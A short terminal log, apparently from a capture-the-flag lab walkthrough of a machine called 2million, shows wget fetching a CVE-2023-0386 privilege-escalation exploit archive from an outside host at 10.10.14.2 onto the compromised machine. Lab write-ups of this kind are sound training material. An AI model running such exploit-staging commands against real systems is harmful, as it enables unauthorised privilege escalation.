admin@2million:/tmp$ wget http://10.10.14.2/CVE-2023-0386.zip
--2024-03-06 02:13:29--  http://10.10.14.2/CVE-2023-0386.zip
Connecting to 10.10.14.2:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 471222 (460K) [application/zip]
Saving to: ‘CVE-2023-0386.zip’

CVE-2023-0386.zip                           100%[===========================================================================================>] 460.18K  1.81MB/s    in 0.2s    

2024-03-06 02:13:30 (1.81 MB/s) - ‘CVE-2023-0386.zip’ saved [471222/471222]
